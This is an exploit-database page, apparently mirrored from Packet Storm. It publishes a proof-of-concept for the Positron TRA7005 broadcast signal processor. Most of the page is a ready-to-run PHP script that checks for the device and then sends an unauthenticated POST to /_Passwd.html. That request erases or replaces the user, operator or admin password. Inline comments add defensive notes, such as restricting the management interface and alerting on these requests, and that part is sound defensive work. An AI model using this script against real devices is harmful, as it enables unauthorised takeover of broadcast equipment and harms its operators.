## https://sploitus.com/exploit?id=PACKETSTORM:181855
=============================================================================================================================================  
| # Title : Positron Broadcast Signal Processor TRA7005 v1.20 5.1.6 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |  
| # Vendor : https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Cross-site request forgery causes authentication bypass in Positron DSP (TRA7005)   
  
[+] save as poc.php  
  
[+] Usage : C:\www\test>php 3.php poc.php  
  
[+] payload :   
  
<?php

// Proof-of-concept from the advisory above for the Positron TRA7005 web interface.
// Flow as written here: (1) GET /_Device.html and look for the marker string
// 'TRA7K5'; (2) POST one form field, PSW_<role>, to /_Passwd.html.
// Neither request sets a Cookie or Authorization header, so the password change
// is sent without any credential or prior login.
// NOTE(review): the advisory titles this CSRF, but this script issues the request
// directly rather than through a logged-in user's browser. What it relies on is the
// endpoint accepting the change without a session - confirm on the device.
// Defensive reading: the page names no fixed firmware, so the control available
// from this information alone is limiting which hosts can reach the device's HTTP
// management interface, and alerting on POSTs to /_Passwd.html carrying a PSW_* field.

// Make sure the arguments are valid: exactly three after the script name
// (target, role, action). The usage text says positron.php although the advisory
// says to save the file as poc.php.
if ($argc != 4) {
echo "Usage: php positron.php <ip:port> <user/oper/admin> <erase/new_pwd>\n";
exit(1);
}

$ip = $argv[1];
$ut = $argv[2];
$wa = $argv[3];

// Validate the user type. Only a lower-cased copy is compared; $ut itself keeps
// the casing that was typed and is used again when the field name is built.
$valid_ut = ['user', 'oper', 'admin'];
if (!in_array(strtolower($ut), $valid_ut)) {
echo "Invalid user type! Use 'user', 'oper', or 'admin'.\n";
exit(1);
}

// Both URLs are plain http:// and are built from the raw first argument.
$url = "http://$ip/_Passwd.html";
$did = "http://$ip/_Device.html";

// Check the device and decide whether it is the affected model: fetch
// /_Device.html (default GET, no custom headers) and search the body for 'TRA7K5'.
// '@' hides the PHP warning on failure; the === FALSE test handles that case.
$response = @file_get_contents($did);
if ($response === FALSE) {
echo "Error checking device.\n";
exit(1);
} elseif (strpos($response, 'TRA7K5') !== false) {
echo "Vulnerable processor found!\n";
} else {
echo "Not Vulnerable or not applicable. Exploit exiting.\n";
exit(1);
}

// Set up the request headers for the POST. User-Agent 'R-Marina/11.9' and
// Accept-Language 'mk-MK,en;q=0.6' are fixed strings in this script, so they
// identify this exact file only; they are ordinary literals, and detections are
// better anchored on the /_Passwd.html path and the PSW_* parameter.
$options = [
'http' => [
'header' => [
'Content-Type: application/x-www-form-urlencoded',
'Accept-Language: mk-MK,en;q=0.6',
'Accept-Encoding: gzip, deflate',
'User-Agent: R-Marina/11.9',
'Accept: */*'
],
'method' => 'POST',
'content' => '',
],
];

$payload = [];
// The field name is 'PSW_' plus ucfirst($ut): 'PSW_User', 'PSW_Oper' or
// 'PSW_Admin' for lower-case input. ucfirst() leaves the remaining letters as
// typed, so log matching on this field should be case-insensitive.
// If the goal is to erase the password, the literal value 'NONE' is sent.
// NOTE(review): presumably the device treats 'NONE' as "no password" - not shown on this page.
if (strtolower($wa) == 'erase') {
$payload['PSW_' . ucfirst($ut)] = 'NONE';
} else {
// If the goal is to set a new password, the third argument is sent verbatim.
$payload['PSW_' . ucfirst($ut)] = $wa;
}

// URL-encode the single field into the POST body.
$options['http']['content'] = http_build_query($payload);

// Execute the POST request.
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

// Print whatever the device returned. On failure only a message is printed and
// the script still ends with exit status 0.
if ($result === FALSE) {
echo "Failed to send the request.\n";
} else {
echo "Response:\n";
echo $result;
}
?>
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================